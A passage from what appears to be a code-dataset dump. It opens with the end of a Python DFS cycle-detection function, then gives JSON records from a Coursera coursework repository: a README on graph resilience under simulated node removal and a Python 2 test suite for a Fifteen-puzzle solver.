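    color = [WHITE] * len(adj)

    def visit(u):
        color[u] = GRAY
        for v in adj[u]:
            if color[v] == GRAY:        # back edge to the current path
                return True
            if color[v] == WHITE and visit(v):
                return True
        color[u] = BLACK                # u and its subtree are cycle-free
        return False

    return any(color[u] == WHITE and visit(u) for u in range(len(adj)))
```

For example, `has_cycle([[1], [0]])` returns `True` (a two-vertex cycle), while `has_cycle([[1], []])` returns `False`. Because BLACK vertices are never revisited, each vertex and edge is processed once.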
{
"alpha_fraction": 0.7995238304138184,
"alphanum_fraction": 0.8047618865966797,
"avg_line_length": 115.72222137451172,
"blob_id": "2a96f6e6b03c57976f17939eae913374f754a54c",
"content_id": "64d1178933c63ba24298e0e4eca1b7468bdbca75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2100,
"license_type": "no_license",
"max_line_length": 500,
"num_lines": 18,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 2/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Project and Application Overviews\n## Project #2: Connect Components and Graph Resilience \n\n* For the Project component of Module 2, you will first write Python code that implements breadth-first search. Then, you will use this function to compute the set of connected components (CCs) of an undirected graph as well as determine the size of its largest connected component. Finally, you will write a function that computes the resilience of a graph (measured by the size of its largest connected component) as a sequence of nodes are deleted from the graph.\n\n* You will use these functions in the Application component of Module 2 where you will analyze the resilience of a computer network, modeled by a graph. As in Module 1, graphs will be represented using dictionaries.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-1/supplement/9tlQe/project-2-description>\n\n## Application #2: Analysis of a Computer Network\n\n* Graph exploration (that is, \"visiting\" the nodes and edges of a graph) is a powerful and necessary tool to elucidate properties of graphs and quantify statistics on them. For example, by exploring a graph, we can compute its degree distribution, pairwise distances among nodes, its connected components, and centrality measures of its nodes and edges. As we saw in the Homework and Project, breadth-first search can be used to compute the connected components of a graph.\n\n* In this Application, we will analyze the connectivity of a computer network as it undergoes a cyber-attack. In particular,we will simulate an attack on this network in which an increasing number of servers are disabled. In computational terms, we will model the network by an undirected graph and repeatedly delete nodes from this graph. We will then measure the resilience of the graph in terms of the size of the largest remaining connected component as a function of the number of nodes deleted.\n\nComplete application description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-1/supplement/0ekiq/application-2-description>"
},
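The Module 2 README above describes the pipeline in prose only. Below is a sketch of the two core steps under the dictionary-of-sets graph representation the description mentions; the function names `bfs_visited` and `cc_visited` are assumptions chosen to match the prose (breadth-first search, then connected components), not quotations from the project.

```python
from collections import deque

def bfs_visited(ugraph, source):
    """Return the set of all nodes reachable from source in the undirected
    graph ugraph, a dict mapping each node to a set of its neighbours."""
    visited = {source}
    queue = deque([source])
    while queue:
        node = queue.popleft()
        for neighbor in ugraph[node]:
            if neighbor not in visited:
                visited.add(neighbor)
                queue.append(neighbor)
    return visited

def cc_visited(ugraph):
    """Return a list of sets, one per connected component of ugraph."""
    remaining = set(ugraph)
    components = []
    while remaining:
        component = bfs_visited(ugraph, next(iter(remaining)))
        components.append(component)
        remaining -= component
    return components
```

Resilience then falls out directly: after each node deletion, take `max(len(cc) for cc in cc_visited(ugraph))` as the size of the largest remaining component.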
{
"alpha_fraction": 0.36492159962654114,
"alphanum_fraction": 0.4296209514141083,
"avg_line_length": 42.77567672729492,
"blob_id": "25410c4235f20d54a2ea28d7a55bf16404aba445",
"content_id": "e7aa192253166d1d530d4be9949075c3d9db8f93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 32396,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 740,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project4 Fifteen Puzzle/fifteen_puzzle_testsuite.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTesting suite for functions used in \nLoyd's Fifteen puzzle - solver Mini-project\nNote that solved configuration has the blank \n(zero) tile in upper left\n\"\"\"\n\nimport poc_simpletest as simpletest\nimport user46_p9CLHFUXsW_56 as puzzle\n\nclass TestFifteenPuzzle():\n \"\"\"\n function that tests the lower_row_invariant\n of the Fifteen puzzle - solver\n \"\"\"\n def test_lower_row_invariant(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running lower_row_invariant function test...\"\n\n # Test #1.1: create an scramble board with Zero tile\n # not at target position\n game_board = [[0, 1, 4, 3], \n [9, 7, 5, 8], \n [15, 2, 6, 14], \n [13, 11, 12, 10]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(1,1)\n exp_lower_row_inv = False\n \n # run the Test #1.1 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.1: lower_row_invariant\")\n \n # Test #1.2: create an scramble board with Zero tile\n # at the target position but still failing the invariant\n game_board = [[8, 1, 4, 3], \n [9, 7, 5, 0], \n [15, 2, 6, 14], \n [13, 11, 12, 10]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(1,3)\n exp_lower_row_inv = False\n \n # run the Test #1.2 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.2: lower_row_invariant\")\n \n # Test #1.3: create an board with Zero tile not at the \n # target position but all other tiles are in solved position\n game_board = [[0, 1, 4, 3], \n [6, 2, 5, 7], \n [8, 9, 10, 11], \n [12, 13, 14, 15]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(1,2)\n exp_lower_row_inv = False\n \n # run the Test #1.3 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.3: lower_row_invariant\")\n \n \n \n # Test #1.4: create an scramble board with Zero tile\n # at the target position but invariant is false because \n # the following conidiotn is not met:\n # all tiles in target_row + 1 or below are positioned \n # at their solved location.\n game_board = [[8, 1, 4, 3], \n [9, 5, 0, 7], \n [15, 2, 6, 14], \n [13, 11, 12, 10]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(1,2)\n exp_lower_row_inv = False\n \n # run the Test #1.4 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.4: lower_row_invariant\")\n \n # Test #1.5: create an scramble board with Zero tile\n # at the target position but invariant is false because \n # the following conidiotn is not met:\n # all tiles in target_row to the right of target position are \n # positioned at their solved location.\n game_board = [[1, 2, 3, 4], \n [5, 7, 0, 6], \n [8, 9, 10, 11], \n [12, 13, 14, 15]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(1,2)\n exp_lower_row_inv = False\n \n # run the Test #1.5 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.5: lower_row_invariant\")\n \n # Test #1.6: create an scramble board with that meets the \n # lower row invariant\n game_board = [[3, 2, 1, 4], \n [6, 5, 0, 7], \n [8, 9, 10, 11], \n [12, 13, 14, 15]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = 
my_game.lower_row_invariant(1,2)\n exp_lower_row_inv = True\n \n # run the Test #1.6 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.6: lower_row_invariant\")\n \n # Test #1.7: check row, col corner positions to see if \n # invriant is still valid\n game_board = [[3, 2, 1, 0], \n [4, 5, 6, 7], \n [8, 9, 10, 11], \n [12, 13, 14, 15]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(0,3)\n exp_lower_row_inv = True\n \n # run the Test #1.7 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.7: lower_row_invariant\")\n \n # Test #1.8: all tiles except for one are in solved position\n # invariant should be False\n game_board = [[3, 2, 1, 10], \n [4, 5, 6, 7], \n [8, 9, 0, 11], \n [13, 12, 14, 15]]\n my_game = puzzle.Puzzle(4, 4, game_board)\n comp_lower_row_inv = my_game.lower_row_invariant(2,2)\n exp_lower_row_inv = False\n \n # run the Test #1.8 and compare the computed vs expected\n suite.run_test(str(comp_lower_row_inv), str(exp_lower_row_inv), \n \"Test #1.8: lower_row_invariant\")\n\n\n # report number of tests and failures\n suite.report_results()\n print \n \n def test_solve_interior_tile(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running solve_interior_tile function test...\"\n\n # Test #2.1: check the case when the current column\n # of the target tile is to the right of target_col\n # and current row > 0 \n my_puzzle = puzzle.Puzzle(5, 5, [[1, 2, 3, 4, 5],\n [6, 7, 8, 9, 22],\n [11, 12, 13, 14, 15],\n [16, 17, 18, 19, 20],\n [21, 10, 0, 23, 24]])\n my_puzzle.solve_interior_tile(4, 2)\n comp_out = my_puzzle.lower_row_invariant(4, 1)\n act_out = True\n \n # run the Test #2.1 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.1: solve_interior_tile\")\n \n # Test #2.2: check the case when the current column\n # of the target tile is to the right of target_col\n # and current row of target tile is 0\n my_puzzle = puzzle.Puzzle(5, 5, [[1, 2, 3, 4, 22],\n [6, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [16, 17, 18, 19, 20],\n [21, 10, 0, 23, 24]])\n my_puzzle.solve_interior_tile(4, 2)\n comp_out = my_puzzle.lower_row_invariant(4, 1)\n act_out = True\n \n # run the Test #2.2 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.2: solve_interior_tile\")\n \n # Test #2.3: check the case when the current column\n # of the target tile is to the right of target_col\n # and current row is just above target_row \n my_puzzle = puzzle.Puzzle(5, 5, [[1, 2, 3, 4, 19],\n [6, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [16, 17, 18, 20, 22],\n [21, 10, 0, 23, 24]])\n my_puzzle.solve_interior_tile(4, 2)\n comp_out = my_puzzle.lower_row_invariant(4, 1)\n act_out = True\n \n # run the Test #2.3 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.3: solve_interior_tile\")\n \n # Test #2.4: check the case when the current column\n # of the target tile is to the left of target_col\n # and current row is 0\n my_puzzle = puzzle.Puzzle(5, 5, [[22, 2, 3, 4, 19],\n [6, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [16, 17, 18, 20, 1],\n [21, 10, 0, 23, 24]])\n my_puzzle.solve_interior_tile(4, 2)\n comp_out = my_puzzle.lower_row_invariant(4, 1)\n act_out = True\n \n # run the Test #2.4 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.4: 
solve_interior_tile\")\n \n # Test #2.5: check the case when the current column\n # of the target tile is to the left of target_col\n # and current row > 0\n my_puzzle = puzzle.Puzzle(5, 5, [[6, 2, 3, 4, 19],\n [22, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [16, 17, 18, 20, 1],\n [21, 10, 0, 23, 24]])\n my_puzzle.solve_interior_tile(4, 2)\n comp_out = my_puzzle.lower_row_invariant(4, 1)\n act_out = True\n \n # run the Test #2.5 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.5: solve_interior_tile\")\n \n # Test #2.6: check the case when the current column\n # of the target tile is to the left of target_col\n # and current row is just above target_row\n my_puzzle = puzzle.Puzzle(5, 5, [[6, 2, 3, 4, 19],\n [16, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [22, 17, 18, 20, 1],\n [21, 10, 0, 23, 24]])\n my_puzzle.solve_interior_tile(4, 2)\n comp_out = my_puzzle.lower_row_invariant(4, 1)\n act_out = True\n \n # run the Test #2.6 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.6: solve_interior_tile\")\n \n # Test #2.7: check the case when the target_col - current column > 1 \n # and current row = target_row\n my_puzzle = puzzle.Puzzle(5, 5, [[6, 2, 3, 4, 19],\n [16, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [22, 17, 18, 20, 1],\n [23, 10, 21, 0, 24]])\n my_puzzle.solve_interior_tile(4, 3)\n comp_out = my_puzzle.lower_row_invariant(4, 2)\n act_out = True\n \n # run the Test #2.7 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.7: solve_interior_tile\")\n \n # Test #2.8: check the case when the (target_col - current column) = 1 \n # and current row = target_row\n my_puzzle = puzzle.Puzzle(5, 5, [[6, 2, 3, 4, 19],\n [16, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [22, 17, 18, 20, 1],\n [21, 10, 23, 0, 24]])\n my_puzzle.solve_interior_tile(4, 3)\n comp_out = my_puzzle.lower_row_invariant(4, 2)\n act_out = True\n \n # run the Test #2.8 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.8: solve_interior_tile\")\n \n # Test #2.9: check the case when the (target_col = current column\n # and current row - target_row = 1\n my_puzzle = puzzle.Puzzle(5, 5, [[6, 2, 3, 4, 19],\n [16, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [22, 17, 18, 23, 1],\n [21, 10, 20, 0, 24]])\n my_puzzle.solve_interior_tile(4, 3)\n comp_out = my_puzzle.lower_row_invariant(4, 2)\n act_out = True\n \n # run the Test #2.9 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.9: solve_interior_tile\")\n \n # Test #2.10: check the case when the (target_col = current column\n # and current row - target_row > 1\n my_puzzle = puzzle.Puzzle(5, 5, [[6, 2, 3, 23, 4],\n [16, 7, 8, 9, 5],\n [11, 12, 13, 14, 15],\n [22, 17, 18, 19, 1],\n [21, 10, 20, 0, 24]])\n my_puzzle.solve_interior_tile(4, 3)\n comp_out = my_puzzle.lower_row_invariant(4, 2)\n act_out = True\n \n # run the Test #2.10 and compare the computed vs expected\n suite.run_test(str(comp_out), str(act_out), \n \"Test #2.10: solve_interior_tile\")\n \n # report number of tests and failures\n suite.report_results()\n print \n \n def test_solve_col0_tile(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running solve_col0_tile function test...\"\n\n # Test #3.1: check the case when the target tile's\n # current column is to the right of column 0.\n # current column > 1 and (current row - target_row) = 1\n my_puzzle = puzzle.Puzzle(5, 5, [[1, 2, 
3, 4, 5],\n [6, 7, 8, 9, 10],\n [11, 12, 13, 14, 15],\n [16, 17, 18, 19, 20],\n [0, 21, 22, 23, 24]])\n my_puzzle.solve_col0_tile(4)\n comp_out = my_puzzle.lower_row_invariant(3, 4)\n exp_out = True\n \n # run the Test #3.1 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #3.1: solve_col0_tile\")\n \n # Test #3.2: check the case when the target tile's\n # current column is to the right of column 0.\n # current column = 1 and (current row - target_row) = 1\n my_puzzle = puzzle.Puzzle(5, 5, [[1, 2, 3, 4, 5],\n [6, 7, 8, 9, 10],\n [11, 12, 13, 14, 15],\n [16, 20, 18, 19, 17],\n [0, 21, 22, 23, 24]])\n my_puzzle.solve_col0_tile(4)\n comp_out = my_puzzle.lower_row_invariant(3, 4)\n exp_out = True\n \n # run the Test #3.2 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #3.2: solve_col0_tile\")\n \n # Test #3.3: check the case when the target tile's\n # current column is to the right of column 0 (current column > 1)\n # and current row = 0\n my_puzzle = puzzle.Puzzle(5, 5, [[1, 2, 3, 4, 20],\n [6, 7, 8, 9, 10],\n [11, 12, 13, 14, 15],\n [16, 5, 18, 19, 17],\n [0, 21, 22, 23, 24]])\n my_puzzle.solve_col0_tile(4)\n comp_out = my_puzzle.lower_row_invariant(3, 4)\n exp_out = True\n \n # run the Test #3.3 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #3.3: solve_col0_tile\")\n \n # Test #3.4: check the case when the target tile's\n # current column is column 0 (current column = 0) \n # and current row = 0\n my_puzzle = puzzle.Puzzle(5, 5, [[20, 2, 3, 4, 1],\n [6, 7, 8, 9, 10],\n [11, 12, 13, 14, 15],\n [16, 5, 18, 19, 17],\n [0, 21, 22, 23, 24]])\n my_puzzle.solve_col0_tile(4)\n comp_out = my_puzzle.lower_row_invariant(3, 4)\n exp_out = True\n \n # run the Test #3.4 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #3.4: solve_col0_tile\")\n \n # Test #3.5: check the case when the target tile's\n # current column is column 0 (current column = 0) \n # and current row = target_row - 1\n my_puzzle = puzzle.Puzzle(5, 5, [[16, 2, 3, 4, 1],\n [6, 7, 8, 9, 10],\n [11, 12, 13, 14, 15],\n [20, 5, 18, 19, 17],\n [0, 21, 22, 23, 24]])\n my_puzzle.solve_col0_tile(4)\n comp_out = my_puzzle.lower_row_invariant(3, 4)\n exp_out = True\n \n # run the Test #3.5 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #3.5: solve_col0_tile\")\n \n # report number of tests and failures\n suite.report_results()\n print \n \n def test_row0_invariant(self):\n \n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running row0_invariant function test...\" \n \n # Test #4.1: tile zero is in the incorrect position\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 0, 1, 4],\n [5, 6, 7, 8, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row0_invariant(3)\n exp_out = False\n \n # run the Test #4.1 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #4.1: row0_invariant\")\n \n # Test #4.2: row 1 tiles are not in their solved\n # positions\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 1, 0, 4],\n [5, 6, 7, 9, 8],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row0_invariant(3)\n exp_out = False\n \n # run the Test #4.2 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #4.2: row0_invariant\")\n \n # Test #4.3: row 0 tiles 
are not in their solved\n # positions\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 4, 1, 0, 3],\n [5, 6, 7, 8, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row0_invariant(3)\n exp_out = False\n \n # run the Test #4.3 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #4.3: row0_invariant\")\n \n # Test #4.4: a row > 1 has tiles that are not in their solved\n # positions\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 1, 0, 4],\n [5, 6, 7, 8, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 23, 22, 24]])\n \n comp_out = my_puzzle.row0_invariant(3)\n exp_out = False\n \n # run the Test #4.4 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #4.4: row0_invariant\")\n \n \n # Test #4.5: the puzzle configurate meets the invariant \n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 1, 0, 4],\n [5, 7, 6, 8, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row0_invariant(3)\n exp_out = True\n \n # run the Test #4.5 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #4.5: row0_invariant\") \n \n # report number of tests and failures\n suite.report_results()\n print \n \n def test_row1_invariant(self):\n\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running row1_invariant function test...\" \n \n # Test #5.1: tile zero is in the incorrect position\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 9, 1, 4],\n [5, 6, 7, 8, 0],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row1_invariant(3)\n exp_out = False\n \n # run the Test #5.1 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #5.1: row1_invariant\")\n \n # Test #5.2: tiles in row 0 to the right of\n # the zero tile are not in their solved position\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 4, 8, 1, 3],\n [5, 7, 6, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row1_invariant(3)\n exp_out = False\n \n # run the Test #5.2 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #5.2: row1_invariant\")\n \n # Test #5.3: tiles in row 1 to the right of\n # the zero tile are not in their solved position\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 9, 1, 4],\n [5, 7, 6, 0, 8],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row1_invariant(3)\n exp_out = False\n \n # run the Test #5.3 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #5.3: row1_invariant\")\n\n # Test #5.4: tiles in row > 1 are not in their solved position\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 8, 1, 4],\n [5, 7, 6, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 18, 17, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row1_invariant(3)\n exp_out = False\n \n # run the Test #5.4 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #5.4: row1_invariant\")\n \n # Test #5.5: puzzle configuration meets the invariant\n my_puzzle = puzzle.Puzzle(5, 5, [[2, 3, 8, 1, 4],\n [5, 7, 6, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n \n comp_out = my_puzzle.row1_invariant(3)\n exp_out = True\n \n # run the Test #5.5 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n 
\"Test #5.5: row1_invariant\") \n \n # report number of tests and failures\n suite.report_results()\n print\n \n def test_solve_row0_tile(self):\n \n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running solve_row0_tile function test...\"\n\n # Test #6.1: current position of the target tile \n # is just left of target position and current row\n # is 0\n my_puzzle = puzzle.Puzzle(5, 5, [[3, 1, 2, 4, 0],\n [5, 6, 7, 8, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row0_tile(4)\n comp_out = my_puzzle.row1_invariant(3)\n exp_out = True\n \n # run the Test #6.1 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #6.1: solve_row0_tile\")\n \n \n # Test #6.2: current position of the target tile \n # is just left of target position and current row\n # is 1\n my_puzzle = puzzle.Puzzle(5, 5, [[3, 1, 2, 8, 0],\n [5, 6, 7, 4, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row0_tile(4)\n comp_out = my_puzzle.row1_invariant(3)\n exp_out = True\n \n # run the Test #6.2 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #6.2: solve_row0_tile\")\n \n \n # Test #6.3: target_col - current column > 1 and \n # current row is 0\n my_puzzle = puzzle.Puzzle(5, 5, [[4, 1, 2, 8, 0],\n [5, 6, 7, 3, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row0_tile(4)\n comp_out = my_puzzle.row1_invariant(3)\n exp_out = True\n \n # run the Test #6.3 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #6.3: solve_row0_tile\")\n \n # Test #6.4: target_col - current column > 1 and \n # current row is 1\n my_puzzle = puzzle.Puzzle(5, 5, [[6, 1, 2, 8, 0],\n [5, 4, 7, 3, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row0_tile(4)\n comp_out = my_puzzle.row1_invariant(3)\n exp_out = True\n \n # run the Test #6.4 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #6.4: solve_row0_tile\") \n \n # report number of tests and failures\n suite.report_results()\n print \n \n def test_solve_row1_tile(self):\n \n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running solve_row1_tile function test...\" \n \n # Test #7.1: target_col = current column and \n # current row is 0\n my_puzzle = puzzle.Puzzle(5, 5, [[3, 1, 2, 8, 4],\n [5, 6, 7, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row1_tile(3)\n comp_out = my_puzzle.row0_invariant(3)\n exp_out = True\n \n # run the Test #7.1 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #7.1: solve_row1_tile\")\n \n # Test #7.2: target_col - current column = 1 and \n # current row is 0\n my_puzzle = puzzle.Puzzle(5, 5, [[3, 1, 8, 2, 4],\n [5, 6, 7, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row1_tile(3)\n comp_out = my_puzzle.row0_invariant(3)\n exp_out = True\n \n # run the Test #7.2 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #7.2: solve_row1_tile\")\n \n # Test #7.3: target_col - current column = 1 and \n # current row is 1\n my_puzzle = puzzle.Puzzle(5, 5, [[3, 1, 7, 2, 4],\n [5, 6, 8, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row1_tile(3)\n 
comp_out = my_puzzle.row0_invariant(3)\n exp_out = True\n \n # run the Test #7.3 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #7.3: solve_row1_tile\")\n \n # Test #7.4: target_col - current column > 1 and \n # current row is 1\n my_puzzle = puzzle.Puzzle(5, 5, [[3, 1, 7, 2, 4],\n [5, 8, 6, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row1_tile(3)\n comp_out = my_puzzle.row0_invariant(3)\n exp_out = True\n \n # run the Test #7.4 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #7.4: solve_row1_tile\")\n \n # Test #7.5: target_col - current column > 1 and \n # current row is 0\n my_puzzle = puzzle.Puzzle(5, 5, [[3, 1, 7, 2, 4],\n [5, 8, 6, 0, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24]])\n my_puzzle.solve_row1_tile(3)\n comp_out = my_puzzle.row0_invariant(3)\n exp_out = True\n \n # run the Test #7.5 and compare the computed vs expected\n suite.run_test(str(comp_out), str(exp_out), \n \"Test #7.5: solve_row1_tile\") \n \n # report number of tests and failures\n suite.report_results()\n print \n\n# test all functions of the word wangler pini-project\ntest_puzzle = TestFifteenPuzzle()\ntest_puzzle.test_lower_row_invariant()\ntest_puzzle.test_solve_interior_tile()\ntest_puzzle.test_solve_col0_tile()\ntest_puzzle.test_row0_invariant()\ntest_puzzle.test_row1_invariant()\ntest_puzzle.test_solve_row0_tile()\ntest_puzzle.test_solve_row1_tile()\n\n\n"
},
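Every test in the fifteen-puzzle suite above checks `lower_row_invariant(target_row, target_col)` against a hand-built board, so it helps to see the property being asserted. A sketch of that check is below, assuming the course's `Puzzle` API (`get_number`, `get_width`, `get_height`) and the solved value `row * width + col` implied by the suite's docstring (blank tile in the upper left); treat the details as assumptions rather than the graded solution.

```python
def lower_row_invariant(puzzle, target_row, target_col):
    """Check the invariant the tests exercise: the zero tile sits at
    (target_row, target_col), every tile to its right in that row is
    solved, and every tile in all rows below is solved."""
    width, height = puzzle.get_width(), puzzle.get_height()
    if puzzle.get_number(target_row, target_col) != 0:
        return False
    # rest of target_row, to the right of the zero tile
    for col in range(target_col + 1, width):
        if puzzle.get_number(target_row, col) != target_row * width + col:
            return False
    # every row below target_row must be fully solved
    for row in range(target_row + 1, height):
        for col in range(width):
            if puzzle.get_number(row, col) != row * width + col:
                return False
    return True
```

This is why, e.g., Test #1.8 expects `False`: the zero tile is in place at (2, 2), but row 3 holds 13 and 12 swapped, violating the "all rows below are solved" clause.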
{
"alpha_fraction": 0.5735543370246887,
"alphanum_fraction": 0.5783575177192688,
"avg_line_length": 31.4678897857666,
"blob_id": "a357a7c6bdb5d6f6cd3b75150ad388c82916b4e5",
"content_id": "506a78037edfebdf65c924d2aa169137594db19a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10618,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 327,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project5 Cookie Clicker/cookieclicker.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
